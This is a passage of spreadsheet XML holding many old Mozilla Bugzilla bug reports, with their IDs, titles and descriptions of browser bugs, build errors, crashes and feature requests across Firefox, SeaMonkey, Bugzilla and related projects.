When making synchronous ajax calls Firefox becomes unresponsive until the call completes. This was not the case in 3.0.x. A demonstration can be found at http://www.richardsimoes.com/sjax/ . In it sjax calls are being made every two seconds to a file. The file is a CGI script with a 0.5-second sleep following by a single print line. To see the bug in action attempt type something in the text box.
Reproducible: Always
Steps to Reproduce:
1. Make synchronous ajax call
2. Attempt to do anything in the browser.
Actual Results:  
Keystrokes will be ignored tab-changing will briefly stop functioning etc.
Expected Results:  
Normal functionality</t>
  </si>
  <si>
    <t>rsimoes+ff_bugzilla</t>
  </si>
  <si>
    <t>CORE-377433</t>
  </si>
  <si>
    <t>Try setting JSOPTION_ANONFUNFIX for 1.9a4</t>
  </si>
  <si>
    <t>We hope not to break the Web by fixing this old SpiderMonkey bug with the new runtime option added in bug 376052.
/be</t>
  </si>
  <si>
    <t>CORE-526436</t>
  </si>
  <si>
    <t>AIX Compilation error for 3.7a1pre source js/src/jsvector.h line 677.21: 1540-0274 (S) The name lookup for PointerRangeSize did not find a declaration</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
While compiling Mozilla Firefox source for 3.7a1pre getting
the below error.
/home/firefox/mozilla-central/js/src/jsvector.h line 677.21: 1540-0274 (S) The name lookup for PointerRangeSize did not find a declaration.
/home/firefox/mozilla-central/js/src/jsvector.h line 677.21: 1540-1292 (I) Static declarations are not considered for a function call if the function is not qualified.
/home/firefox/mozilla-central/js/src/jsvector.h line 674.1: 1540-0700 (I) The previous message was produced while processing js::Vector::append(const unsigned short * const unsigned short *).
/home/firefox/mozilla-central/js/src/jsarray.cpp line 1374.1: 1540-0700 (I) The previous message was produced while processing array_toSource(JSContext * uintN jsval *).
/home/firefox/mozilla-central/js/src/jsvector.h line 677.21: 1540-0274 (S) The name lookup for PointerRangeSize did not find a declaration.
/home/firefox/mozilla-central/js/src/jsvector.h line 677.21: 1540-1292 (I) Static declarations are not considered for a function call if the function is not qualified.
/home/firefox/mozilla-central/js/src/jsvector.h line 674.1: 1540-0700 (I) The previous message was produced while processing js::Vector::append(const char * const char *).
/home/firefox/mozilla-central/js/src/jsvector.h line 418.13: 1540-0700 (I) The previous message was produced while processing js::js_AppendLiteral(Vector &amp; const char (&amp;)[3]).
/home/firefox/mozilla-central/js/src/jsarray.cpp line 1454.18: 1540-0700 (I) The previous message was produced while processing array_toSource(JSContext * uintN jsval *).
/home/firefox/mozilla-central/js/src/jscntxt.h line 1580.44: 1540-1281 (W) offsetof cannot be applied to struct JSContext.  It is not a POD (plain old data) type.
gmake[1]: *** [jsarray.o] Error 1
Reproducible: Always
Steps to Reproduce:
1. Build Mozilla Firefox 3.7a1pre build on AIX with Gnome RPMS of 64 bit
version.
2.
3.
Actual Results:  
Build fails with the above error.
Expected Results:  
No build failure</t>
  </si>
  <si>
    <t>FIREFOX-998073</t>
  </si>
  <si>
    <t>implement test coverage for Amazon search plugin</t>
  </si>
  <si>
    <t>Bing/Google test template are a good start.</t>
  </si>
  <si>
    <t>CORE-446464</t>
  </si>
  <si>
    <t>File permissions are not preserved when zipping with zipwriter</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.2pre) Gecko/2008071803 Thunderbird/3.0a2pre ID:2008071803
After the check-in of the patch on bug 372786 I noticed following behavior:
Using the given attachment 307796 the keynote folder content gets zipped and is
received correctly as zip file. After unpacking the content everything looks
identical. As I see there is one remaining issue when having a more closely
look at the files:
Original keynote file:
drwxr-xr-x@ 3 henrik  staff    102  6 MÃ¤r 21:52 Contents
-rw-r--r--@ 1 henrik  staff  83487  6 MÃ¤r 21:52 index.apxl.gz
drwxr-xr-x@ 3 henrik  staff    102  6 MÃ¤r 21:52 thumbs
Received keynote file:
drwxr-xr-x@ 3 henrik  staff    102  6 MÃ¤r 20:52 Contents
-rwxr-xr-x@ 1 henrik  staff  83487  6 MÃ¤r 20:52 index.apxl.gz
drwxr-xr-x@ 3 henrik  staff    102  6 MÃ¤r 20:52 thumbs
Each file is packed with the executable flag so we have modified permissions
afterwards.</t>
  </si>
  <si>
    <t>CORE-161364</t>
  </si>
  <si>
    <t>Print preview crashes when page has transparent content</t>
  </si>
  <si>
    <t>[Spin-off of bug 156043 (Moz cores when printing [@
nsRenderingContextGTK::Init])]:
Print preview crashes in blender code when the page has transparent content.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-792195</t>
  </si>
  <si>
    <t>Need to create Hardware Component under Boot2Gecko</t>
  </si>
  <si>
    <t>As part of the B2G Test Drivers (dogfooding) program we are requiring people to submit bugs to request hardware (phones). This process will apply to:
- paid staff who need a phone but are not located in Toronto MV or SF
- contributors who need a phone 
Please add Stormy Peters to the cc.</t>
  </si>
  <si>
    <t>CORE-393300</t>
  </si>
  <si>
    <t>DOMStorage leaks mozStorage classes on shutdown</t>
  </si>
  <si>
    <t>nsDOMStorage::gStorageDB needs to be deleted. Leaving sqlite connections open causes crashes and dataloss.</t>
  </si>
  <si>
    <t>CORE-726331</t>
  </si>
  <si>
    <t>make nsComputedDOMStyle a cycle-collector skippable class</t>
  </si>
  <si>
    <t>When I was investigating why TechCrunch cycle collects every 5 seconds I noticed that there are around 480 childless nsComputedDOMStyles in the purple buffer out of around 530 things in the purple buffer total.  If we can remove these from the purple buffer this should reduce how often we trigger a cycle collection on TechCrunch.
nsDOMComputedStyle has only a single field that it tells the CC about:
  nsCOMPtr mContent
Either this field is null or it points to a live DOM node thing.  I was thinking we could do something like saying that DOMStyle can be skipped when its field can be skipped.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-349595</t>
  </si>
  <si>
    <t>add cc ability to current graphs collect.cgi code</t>
  </si>
  <si>
    <t>Add a way to have the current graph collect.cgi code bounce a GET request to another server for the transition stage of new graph server to make them both available.</t>
  </si>
  <si>
    <t>SEAMONKEY-394567</t>
  </si>
  <si>
    <t>Move SeaMonkey parts of mozilla/themes to suite/</t>
  </si>
  <si>
    <t>Most of the mozilla/themes directory containing Classic and Modern is actually SeaMonkey-specific and should move to suite/ - some parts are even XPFE-only and may be completely or party unused now (Camino-like-Firefox is the only XPFE consumers that is left right now on trunk).
Warning - this bug will be a cvs copy orgy -)</t>
  </si>
  <si>
    <t>CORE-81229</t>
  </si>
  <si>
    <t>nsIWebBrowserSetup::SETUP_ALLOW_META_REDIRECTS should control META refreshes to the same url and redirected ones</t>
  </si>
  <si>
    <t>SETUP_ALLOW_META_REDIRECTS - PR_FALSE won't work if the current URI is a plugged
protocol (external protocol handler). This is because the uri.equals code QI's
for THIS_STD_URL_IMPLEMENTATION which external protocols currently aren't using.</t>
  </si>
  <si>
    <t>NSS-157570</t>
  </si>
  <si>
    <t>Crash when an active card is pulled out and a new one inserted.</t>
  </si>
  <si>
    <t>This bug was reported by Rangan Sen on 2002-04-12 13:04:22.
(Ref: blackflag 603767)
If the original card was already logged in NSS crashes.
If not it still shows the certs from the original card
plus the certs in the new ones. Actually it should show
only the certs in the newly inserted cert.
Looks like it's because the older certificates are still
on the cache. Note that if the original card is pulled out
and no new card inserted its behaviour is OK.
Bob could you take a look at this problem and see if it's
already fixed on the tip?</t>
  </si>
  <si>
    <t>CORE-479520</t>
  </si>
  <si>
    <t>Implement IDNA2008 and Unicode UTS #46</t>
  </si>
  <si>
    <t>Our current support for Internationalized Domain Names (IDN) follows a set of rfcs collectively known as IDNA2003 based on an earlier version of Unicode. An updated version known as IDNA2008 is working its way toward standards track in particular taking into account the many new scripts and characters added to the Unicode standard in the past five years.
We should investigate implementing the new standards.
http://tools.ietf.org/wg/idnabis/
http://www.ietf.org/html.charters/idnabis-charter.html
See bug 479336 for examples of problem characters not covered by the earlier standard.</t>
  </si>
  <si>
    <t>SEAMONKEY-228510</t>
  </si>
  <si>
    <t>Warning ``function getContentTypeFromHeaders does not always return a value'' [xs] in file ``chrome://navigator/content/pageInfo.js'' line 951 character 0.</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6b) Gecko/20031208
Warning ``function getContentTypeFromHeaders does not always return a value''
[xs] in file ``chrome://navigator/content/pageInfo.js'' line 951 character 0.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-381484</t>
  </si>
  <si>
    <t>confirmation emails getting marked as spam</t>
  </si>
  <si>
    <t>about 1/3 of all accounts still have confirmationcodes still set.  This means that they haven't registered.  A possible cause is that they never got the email.
I was chasing another email bug and found that lots of emails are failing similar to this error:
May 21 13:14:57 sm-mobile02 sendmail[5387]: l4LKEeAn005385: to= ctladdr= (48/48) delay=00:00:17 xdelay=00:00:17 mailer=esmtp pri=120472 relay=xxxxx.xxx. [83.227.224.189] dsn=5.6.0 stat=Data format error
May 21 13:14:57 sm-mobile02 sendmail[5387]: l4LKEeAn005385: l4LKEvAn005387: DSN: Data format error
What can we do?</t>
  </si>
  <si>
    <t>CORE-515682</t>
  </si>
  <si>
    <t>js/src/jsapi-tests is missing a README file</t>
  </si>
  <si>
    <t>As requested in bug 515273 comment 8.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-375764</t>
  </si>
  <si>
    <t>Change default sort order on browse pages</t>
  </si>
  <si>
    <t>There have been a lot of comments on the blog and I think they make a good point - sorting alphabetically by name isn't that useful.  Of the four sorts we have available right now I think Last Updated is the only one that would actually change the order very often but I'm not sure how useful it would be.
Frank suggested some kind of activity index to sort by ( http://blog.mozilla.com/webdev/2007/03/26/its-aliiiiive/#comment-2325 ) although I don't think we want anything that is computationally expensive unless we add another column in the db.
Anyway the bug is open for ideas I just didn't want to ignore the issue.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-474156</t>
  </si>
  <si>
    <t>Get rid of array_utils.js and use Prototype instead</t>
  </si>
  <si>
    <t>We have Prototype methods to do what array_utils.js has so we can nuke it!</t>
  </si>
  <si>
    <t>TOOLKIT-371731</t>
  </si>
  <si>
    <t>its should probably be it's</t>
  </si>
  <si>
    <t>410  * Because we need to know when to stop looking for the URL its</t>
  </si>
  <si>
    <t>MOZILLA_LABS-474243</t>
  </si>
  <si>
    <t>full message header: make text (name/subject/url) select- and copyable (with context menu 'Copy' for link/source/url)</t>
  </si>
  <si>
    <t>Full message header:
Please make text (name/subject/url) select- and copyable (with context menu 'Copy' for link/source/url).</t>
  </si>
  <si>
    <t>TOOLKIT-321447</t>
  </si>
  <si>
    <t>Allow slower minimum speed for autoscroll</t>
  </si>
  <si>
    <t>Depending on line-width / technical density of text I find the minimum speed for autoscroll slightly too fast to be able to keep it running and read a large piece of text that way - and I am not a slow reader. A slowdown of the minimum speed by 50% (ideally controlled by a preference) would be greatly appreciated.
Snippets from discussion in IRC:
 CTho|away: you can't scroll less than 1 pixel
 NeilAway: we could accumulate rounding error and handle it manually )
 CTho|away: yeah that would work
 I suppose we could have a general.autoscroll.interval pref
 i unddersatnd that we can't easily scroll by subpixel amounts
 comment (cc me?) with info that'll be useful and whether you want to pref the timer or do our own subpixel tracking
 well subpixel tracking sounds nicer right now</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-584244</t>
  </si>
  <si>
    <t>[hera] Add support for multiple zeus boxes</t>
  </si>
  <si>
    <t>:(</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-159230</t>
  </si>
  <si>
    <t>Should be able to bookmark a page without an intermediate dialog</t>
  </si>
  <si>
    <t>Bookmarking a page is one of those things that needs to be a 1-click operation.
We're making it extra-complicated by showing the sheet dialog that asks you
where you want to put the bookmark I'm sure most users will just choose the
default location.
We should just append the bookmark to the end of the list (or have a 'new items'
folder that defaults to the root). Maybe holding down the option key should show
the intermediate sheet dialog.</t>
  </si>
  <si>
    <t>CORE-495028</t>
  </si>
  <si>
    <t>nanojit: add opcode checks to all LIR get/set methods</t>
  </si>
  <si>
    <t>Created attachment 379838
patch adding opcode checks to LIns get/set methods
Nanojit currently checks the opcode for many but not all of the LIns get/set.  This patch adds checks for those methods that lack one.  This makes things safer because calling an unchecked method on the wrong instruction kind will lead to total memory bogosity.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-369825</t>
  </si>
  <si>
    <t>milestone should be bumped</t>
  </si>
  <si>
    <t>Created attachment 254508
bump milestone.txt in Step/Tag/Bump.pm
The milestone.txt should be bumped along with the other version files.</t>
  </si>
  <si>
    <t>CORE-221763</t>
  </si>
  <si>
    <t>XPTC_InvokeByIndex crashes when cross-compiled under GCC 3.x for target arm-linux</t>
  </si>
  <si>
    <t>XPTC_InvokeByIndex crashes when cross-compiled under GCC 3.x for target arm-linux.
I have a patch which fixes this.</t>
  </si>
  <si>
    <t>CORE-423269</t>
  </si>
  <si>
    <t>ASSERTION: This is unsafe when adding iframe with bogus protocol</t>
  </si>
  <si>
    <t>Created attachment 309759
testcase
Loading the testcase triggers:
###!!! ASSERTION: This is unsafe: 'nsContentUtils::IsSafeToRunScript()' file /Users/jruderman/trunk/mozilla/layout/base/nsDocumentViewer.cpp line 1051
###!!! ASSERTION: How did we get here if it's not safe to run scripts?: 'nsContentUtils::IsSafeToRunScript()' file /Users/jruderman/trunk/mozilla/layout/base/nsPresShell.cpp line 5567
These assertions were added in bug 401155.</t>
  </si>
  <si>
    <t>TOOLKIT-462433</t>
  </si>
  <si>
    <t>Update blocklist schema to support severities</t>
  </si>
  <si>
    <t>We're going to need to update the blocklist database and script to support the severities for bug 455906. Technically it wouldn't be necessary to rev the url for this change the new xml would get accepted by old clients.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-368946</t>
  </si>
  <si>
    <t>Need write access for svn.mozilla.org/labs/</t>
  </si>
  <si>
    <t>I need write access for the /labs/ directory in SVN.  My username is wclouser@mozilla.com.  Thanks.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-426183</t>
  </si>
  <si>
    <t>Mozilla Platform</t>
  </si>
  <si>
    <t>Minimally document each JSAPI feature</t>
  </si>
  <si>
    <t>jsapi.h exposes lots of identifiers.  Most are public (i.e. they name functions macros or types that JSAPI applications may use).  Many of the newer ones are undocumented.
There should be a devmo page for each public API with minimally useful documentation for that API.  (Redirects are ok e.g. JSGC_BEGIN redirects to JS_SetGCCallback.)
(taking this -- it's a long-term jorendorff mission)</t>
  </si>
  <si>
    <t>CORE-377947</t>
  </si>
  <si>
    <t>redesign handling of system fonts in style system</t>
  </si>
  <si>
    <t>The handling of system fonts in the style system has bugs in both cascading and serialization (see dependencies for the main ones I know about although I'm not sure if bug 227695 covers all the issues showing up in bug 377731).
We should basically do the following:
 * add a new property called '-moz-system-font' that is set by the font shorthand with initial value 'none' and all the other possible values being the system font values of the 'font' shorthand.
 * add a new value to all the other subproperties of the 'font' shorthand that can be changed by system fonts called '-moz-use-system-font'.
The 'font' shorthand will then set '-moz-system-font' to the value given (or to none when non-system shorthand values are specified) and set all the other properties either to -moz-use-system-font (if relevant) or to their default value (if not relevant).</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-37482</t>
  </si>
  <si>
    <t>[CRASH] corrupt profile causing crash on startup</t>
  </si>
  <si>
    <t>it appears that bad info is getting written to the profile. in the current 
build if I create a new profile run exit and run with that same profile OR 
if I use a previously created profile exit and run with the same profile moz 
crashes with sighup (10) bus error coredump.  I have a stack trace command 
output and a profile directory dump that I will attach.
steps to repeat ( 100% ):
1) run moz
2) create a profile
3) exit
4) run moz again
5) select the profile that you created in 2)
6) watch it crash</t>
  </si>
  <si>
    <t>TOOLKIT-412689</t>
  </si>
  <si>
    <t>var Ci = Ci in function initialises Ci to undefined</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/mozilla/source/toolkit/components/url-classifier/content/moz/preferences.js#257 (bug URL). Sorry if misfiled.
/be</t>
  </si>
  <si>
    <t>WEBMAKER_GRAVEYARD-966188</t>
  </si>
  <si>
    <t>Metrics</t>
  </si>
  <si>
    <t>Set up an A/B test for Webmaker.org</t>
  </si>
  <si>
    <t>Generate ideas for things we could test.
Use page traffic and number of variations to estimate time to complete.
Setup a test in Optimizely (aim for something that can conclude this week).
Corresponding Etherpad:
https://etherpad.mozilla.org/webmaker-workweek-metrics-testing</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-468070</t>
  </si>
  <si>
    <t>New variation of primitive prototype resolution bug: foo['someProp']</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4
Build Identifier: 
Attached is a patch demonstrating an other variation of the bug in primitive prototype resolution when many top scopes are involved.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mguillemot</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-241488</t>
  </si>
  <si>
    <t>cms.nexicom.net - browser check disallows Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a) Gecko/20040422
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a) Gecko/20040422
http://cms.nexicom.net/cgi-bin/main_menu.cgi
Doesn't allow Mozilla.
Reproducible: Always
Steps to Reproduce:
1. http://cms.nexicom.net/cgi-bin/main_menu.cgi
Actual Results:  
JavaScript saying I'm using Netscape 0.
Expected Results:  
The website shouldn't do a browser check.</t>
  </si>
  <si>
    <t>bjlockie</t>
  </si>
  <si>
    <t>CORE-220653</t>
  </si>
  <si>
    <t>Wrong total cell width with table-layout: fixed + colspan + cellspacing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20030916
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20030916
Using a fixed layout table and TD + COLSPAN the size of the cells are wrongly
calculated. Looking at the code it looks like the width of the table available
to cells is decreased by (numColumns * cellspacing) without taking the colspan
variable into account. This leads (as showned in the test case) to the total
width of cells &lt; width of table.
Setting CELLSPACING=0 works around the problem.
IE and KHTML do not show the problem. Problem occurs in 1.4 linux and 1.5rc2 in
windows.
Reproducible: Always
Steps to Reproduce:
1. Set the table style to table-layout: fixed
2. Set the table's CELLSPACING &gt; 0
3. Use COLSPAN &gt; 1 on TD level
Actual Results:  
Total of cells width &lt; Table width
Expected Results:  
Cells should be flowed as to fill the table</t>
  </si>
  <si>
    <t>cbro</t>
  </si>
  <si>
    <t>BUGZILLA-324402</t>
  </si>
  <si>
    <t>Saved searches should be available from a menu</t>
  </si>
  <si>
    <t>We should find a way to display saved searches in a menu at the top of each page or like bookmarks. I have around 30 saved searches and even if the checkin of bug 206425 will help a lot it's still not enough.
What I would like is something like:
Saved Searches
      |
      |- Bugzilla
      |     |
      |     |- open blockers
      |     |- wanted for 2.20 or 2.22
      |     |- open bugs targetted &lt; 2.22
      |     |- patches awaiting checkin
      |     |- patches awaiting my review
      |     |- open bugs assigned to me
      |
      |- Firefox
      |     |
      |     |- blockers for 1.5.0.1
      |     |- Fx bugs I want to see fixed
      |
      |- Thunderbird
            |
            |- annoying bugs
And please don't tell me I can do that manually!</t>
  </si>
  <si>
    <t>Alex.Eiser</t>
  </si>
  <si>
    <t>CALENDAR-155648</t>
  </si>
  <si>
    <t>Todo list should have it's own context-menu + toolbar button to add ToDo item</t>
  </si>
  <si>
    <t>When right-clickin on the todo-list a context-menu is expected with todo-
options like : New To Do Item Edit To Do item Delete To Do item Mark as 
Done and so on...
Or maybe it would be better to call 'To Do item' Task? ('New task' 'Mark task 
as done'...)
Also I would expect a New Task button on the toolbar (or popup menu on the New 
button)</t>
  </si>
  <si>
    <t>CORE-95530</t>
  </si>
  <si>
    <t>topmargin and leftmargin attributes on the BODY element should be honored in all modes (not just Quirks mode)</t>
  </si>
  <si>
    <t>topmargin and leftmargin attribute support on the BODY element is only
implemented in Quirks mode. Some think that this should not be a quirk hence
this bug.
Note that topmargin and leftmargin are not part of the HTML spec and until now
they were IE_specific attributes.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-436793</t>
  </si>
  <si>
    <t>Inconsistent function prototypes for DownloadMessagesForOffline and DeleteSubFolders functions</t>
  </si>
  <si>
    <t>Compiling nsMailModule.cpp on latest trunk I'm seeing:
/Users/moztest/mozilla/hg/mozilla/mailnews/build/../base/util/nsMsgDBFolder.h:83: warning: â€˜virtual nsresult nsMsgDBFolder::DeleteSubFolders(nsIArray* nsIMsgWindow*)â€™ was hidden
/Users/moztest/mozilla/hg/mozilla/mailnews/build/../imap/src/nsImapMailFolder.h:256: warning:   by â€˜virtual nsresult nsImapMailFolder::DeleteSubFolders(nsIMutableArray* nsIMsgWindow*)â€™
/Users/moztest/mozilla/hg/mozilla/mailnews/build/../base/util/nsMsgDBFolder.h:83: warning: â€˜virtual nsresult nsMsgDBFolder::DownloadMessagesForOffline(nsISupportsArray* nsIMsgWindow*)â€™ was hidden
/Users/moztest/mozilla/hg/mozilla/mailnews/build/../imap/src/nsImapMailFolder.h:286: warning:   by â€˜virtual nsresult nsImapMailFolder::DownloadMessagesForOffline(nsIArray* nsIMsgWindow*)â€™
/Users/moztest/mozilla/hg/mozilla/mailnews/build/../base/util/nsMsgDBFolder.h:83: warning: â€˜virtual nsresult nsMsgDBFolder::DownloadMessagesForOffline(nsISupportsArray* nsIMsgWindow*)â€™ was hidden
/Users/moztest/mozilla/hg/mozilla/mailnews/build/../local/src/nsLocalMailFolder.h:192: warning:   by â€˜virtual nsresult nsMsgLocalMailFolder::DownloadMessagesForOffline(nsIArray* nsIMsgWindow*)â€™
/Users/moztest/mozilla/hg/mozilla/mailnews/build/../base/util/nsMsgDBFolder.h:83: warning: â€˜virtual nsresult nsMsgDBFolder::DownloadMessagesForOffline(nsISupportsArray* nsIMsgWindow*)â€™ was hidden
/Users/moztest/mozilla/hg/mozilla/mailnews/build/../news/src/nsNewsFolder.h:105: warning:   by â€˜virtual nsresult nsMsgNewsFolder::DownloadMessagesForOffline(nsIArray* nsIMsgWindow*)â€™
This is a regression because we didn't get these before. The function prototypes were inconsistently/not all changed in bug 435290.</t>
  </si>
  <si>
    <t>BUGZILLA-443852</t>
  </si>
  <si>
    <t>Reset QA Contact to default fails with strict_isolation turned on if there is no default QA contact</t>
  </si>
  <si>
    <t>Created attachment 328279
patch v1
If a bug is restricted to a bug Reset QA Contact to default always fails if there is no QA contact by default because _check_qa_contact() has:
        $invocant-&gt;_check_strict_isolation_for_user($qa_contact)
            if ref $invocant
But $qa_contact is the user object by default (the one with ID = 0) and so _check_strict_isolation_for_user() will complain that this powerless user is not allowed to edit bugs in this product.
We should omit this check if there is no QA contact i.e. if $qa_contact-&gt;id = 0. I didn't check if 3.0.4 is affected but I'm pretty sure this is a regression in 3.2 due to the refactoring of process_bug.cgi.</t>
  </si>
  <si>
    <t>CORE-485642</t>
  </si>
  <si>
    <t>Crash in nsAudioStream::Write while expanding mBufferOverflow</t>
  </si>
  <si>
    <t>On a trunk x86_64 build I'm seeing crashes with nsAudioStream::Write on the stack when playing video.</t>
  </si>
  <si>
    <t>CORE-290522</t>
  </si>
  <si>
    <t>page scrolls in wrong direction (seamonkey/FF)</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050415
Firefox/1.0+
repro:
1.Open FF
2.Open testcase
3.scroll the page down by pressing a few times on the scrolldown button on the
vertical scrollbar
4.place the mouse just above the slider and click
5.the page scrolls down i/o up
6.press a few times on the scrollright button on the horizontal scrollbar
7.place the mouse just left of the slider and click
8.the page is scrolled right i/o left
testcase coming up</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-450666</t>
  </si>
  <si>
    <t>Increase intervals for long-running tests</t>
  </si>
  <si>
    <t>In order to reduce the amount of data the graph server needs to store/retrieve we need to increase the interval for long running tests.
First idea is tests that run for more than 10 minutes can have their intervals increased to once every 10 seconds?</t>
  </si>
  <si>
    <t>SEAMONKEY-416797</t>
  </si>
  <si>
    <t>Add extra files to be removed by the installer</t>
  </si>
  <si>
    <t>My enhanced builds package a few extra files. As the recent problem reported by John Clemente in the mozilla.dev.ports.os2 newsgroup shows it is necessary to add them to the installer so that they get removed before an upgrade. Otherwise they might give problems and SeaMonkey might not even start any more.
The problematic files are:
components/rwsos2.dll
components/rwsos2.xpt
I also package (or at some point packaged)
RWSCLI08.DLL
RWSSRV08.DLL
RWS08.CMD
RWSUTIL08.CMD
RWSCLI07.DLL
RWSSRV07.DLL
RWSUTIL07.CMD
RWSUTIL.CMD
The 07 variant should be removed too as RWS 0.7 isn't supported any more but those of v0.8 we should still leave.
components/ipluginw.{dllreadme} is shipped with my builds too. But that doesn't seem to cause any problems and it might be annoying to users to remove it.
I'll make a patch some time before the next SM release.</t>
  </si>
  <si>
    <t>CORE-293914</t>
  </si>
  <si>
    <t>[FIXr]:hover state remains when ancestor of the hover content is removed</t>
  </si>
  <si>
    <t>See testcase coming up</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-306615</t>
  </si>
  <si>
    <t>fold PSM into libxul</t>
  </si>
  <si>
    <t>This patch will fold PSM into libxul. I can't remember why I didn't do this
before it's pretty simple. This will be trunk-only.</t>
  </si>
  <si>
    <t>CORE-216303</t>
  </si>
  <si>
    <t>[FIX]percentage heights don't work for auto-width floats</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
In the page at http://www.cs.helsinki.fi/u/tksuoran/div_height_percentage.html
the three  elements should usually have the same size due to CSS height:
90% property. I believe that Mozilla does not support percentages in this case.
I tried to put the divs inside a div of different class which had fixed pixel
height but the problem remained.
Reproducible: Always
Steps to Reproduce:
1.Go to http://www.cs.helsinki.fi/u/tksuoran/div_height_percentage.html
2.
3.
Actual Results:  
The  elements appear as their height property would be auto.
Expected Results:  
The  elements should appear as their height property would 90% which
usually makes the three elements the same height.</t>
  </si>
  <si>
    <t>timo</t>
  </si>
  <si>
    <t>CORE-361576</t>
  </si>
  <si>
    <t>underlines sometimes missing or wrong thickness</t>
  </si>
  <si>
    <t>On mac cairo-cocoa builds I'm seeing some underline weirdness on various sites -- looks like a rounding problem.  Some are 1px 2px 0.5px 0px..</t>
  </si>
  <si>
    <t>CORE-71717</t>
  </si>
  <si>
    <t>ComboboxControlFrame is resolving style on a text node: this should be eliminated</t>
  </si>
  <si>
    <t>Text Nodes should not have style applied to them. Currently there is bug 56117
in the style system that allows text nodes to be styled but this needs to be
fixed and when it is the comboboxes will not work correctly.
If we can revisit this and determine if the styling of the text node for the
display area then maybe we can eliminate the styling of the text node.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-469680</t>
  </si>
  <si>
    <t>Provide directory link immediately on try submission</t>
  </si>
  <si>
    <t>There's a very common try server use case that goes:
 - Add a patch to a bug
 - Try server that patch for people to test
 - Once the builds are done comment on the bug with the directory link so that people can fetch that build
What complicates this process is that while the try server is churning on the patch the builds directory ( https://build.mozilla.org/tryserver-builds/?C=MO=D ) shows no sign of it.  This means that the submitter has to poll from time to time seeing if there's a directory so that they can comment in the bug and close the loop.  And typically as soon as (say) the Mac build is done they'll scoop up the directory post it in the bug and say something like Builds still underway but they should appear here...  Bugs like bug 430942 are all about this use case.
I suspect that we can know the directory they will land in the second they are submitted.  I propose one of two things:
1) Create the directory immediately.  Yes it may be empty for a while and in the case of a failed build might be permanently empty but so what?  They're cheap they're cleaned up in 30 days and it gives us a live link target right away.
2) Don't change the build process at all but at least anticipate what the directory WILL be ( timestamp-user@host-buildid ) and output that as a linky on the success page/tinderbox waterfall so that people have a link (albeit not valid yet).
I don't know quite enough about buildbot to make the first thing go but with pointers to the appropriate source I could try to put a patch together.</t>
  </si>
  <si>
    <t>CORE-516331</t>
  </si>
  <si>
    <t>mac OS performance regression with decode-on-draw switched on</t>
  </si>
  <si>
    <t>On saturday I landed decode-on-draw (bug 435296). Windows saw a 9% Tp4 win Mac OS saw a 17% Tp4 regression and linux saw no Tp4 change. Clearly the Mac numbers are scary.
We initially thought it was related to the strategy implemented in bug 512435 being pessimal in a synthetic Tp situation. To experiment Joe and I closed the tree and pushed a patch (well a patch and a followup) that immediately kicked off decode when the first data became available. In other words we were using all of the new code and machinery but forcing a decode-on-load strategy. Unfortunately the numbers didn't seem to change.
I then pushed 2 patches. 1 to set gDecodeOnDraw=PR_FALSEgDiscardable=PR_TRUE and a second to set gDecodeOnDraw=PR_FALSEgDiscardable=PR_FALSE. The rationale for the second patch was that setting gDecodeOnDraw to false (by itself) _should_ be very similar in performance to the instant request strategy that had no effect. If gDiscardable is also set to false we skip storing source data altogether so the code paths change a lot.
Unfortunately there was a Tp4 freeze with the first patch (half on half off) which I'm going to file a bug for shortly. However the second patch fixed the regression so we landed it as bug 516311.
Thus decode-on-draw and discarding are both switched off on trunk. This bug is for figuring out the mac os perf issue and hopefully turning it back on.</t>
  </si>
  <si>
    <t>FIREFOX-407974</t>
  </si>
  <si>
    <t>should url bar autocomplete results decode UTF-8 encoded urls?</t>
  </si>
  <si>
    <t>Created attachment 292675
Screenshot of he.wikipedia.org as suggestion
I've just found that while the new address bar can show %-encoded URLs in the address bar the suggestions panel right after it show them much like the address bar in Firefox 2.
Steps to reproduce:
a. enter any non-latin1 wikipedia site (he.wikipedia.org and ar.wikipedia.org are good examples. 
b. watch the address bar become readable for the whole address (the translation of  Main_Page (en) as the landing page name).
